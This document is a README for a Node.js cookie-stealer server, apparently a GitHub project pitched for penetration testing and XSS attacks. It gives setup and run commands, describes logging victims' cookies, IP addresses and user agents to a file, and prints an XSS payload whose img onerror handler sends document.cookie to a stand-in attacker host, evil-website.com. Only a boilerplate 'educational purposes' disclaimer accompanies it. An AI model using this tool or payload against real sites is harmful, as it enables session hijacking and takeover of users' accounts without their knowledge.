The Node cookie stealer is a tool that can be used in penetration testing and XSS attacks to steal browser cookies from victims. The tool works by setting up a server that listens for incoming requests with a specific cookie value. When a request is received, the tool logs various information about the request, including the date and time, client IP address, user agent, referer, and cookie value, to a file.
This tool can be used by attackers to steal sensitive information, such as session tokens and authentication credentials, from unsuspecting users. By stealing a user's browser cookies, an attacker can gain unauthorized access to the user's account and perform actions on their behalf.
- Clone Project
git clone https://github.com/TheWation/NodeCookieStealer
-
Install Node.js on your machine if you haven't already. You can download the latest version of Node.js from the official website: https://nodejs.org/en/download/
-
Create a new directory for your project and navigate into it using a terminal or command prompt.
-
Create a new file called app.js and copy the Node.js code into it.
-
Open a terminal or command prompt in the project directory and run the following command to install the required dependencies:
npm install express luxonRun the following command to start the server:
node app.jsIn your web browser, visit http://localhost:3000/c/your-cookie-value, replacing your-cookie-value with the value of the cookie that you want to log. For example, if the cookie value is ABC123, you would visit http://localhost:3000/c/ABC123.
The server will log the date and time, client IP address, user agent, referer, and cookie value to the cookies.txt file in the project directory.
[+] Date: 2022/10/03 15:30:45
[+] IP: 127.0.0.1
[+] UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
[+] Referer: http://localhost:3000/
[+] Cookies: ABC123
---
The server will also return a response with a status code of 200 if the request was successful, or a status code of 500 if there was an error writing to the file.
You can repeat step 6 with different cookie values to log additional data to the file.
To stop the server, press CTRL+C in the terminal where it is running.
https://pentest.target/?name=<img src=x onerror=this.src='http://evil-website.com/input.php?cookie='+document.cookie>
For educational purposes only. Do not use for illegal activities. Use at your own risk. By using this tool, you agree to comply with all applicable laws and regulations. Unauthorized use is strictly prohibited. Always obtain permission before using this tool. No warranties.
WebSecurityVision is made with ♥ by Wation and it's released under the MIT license.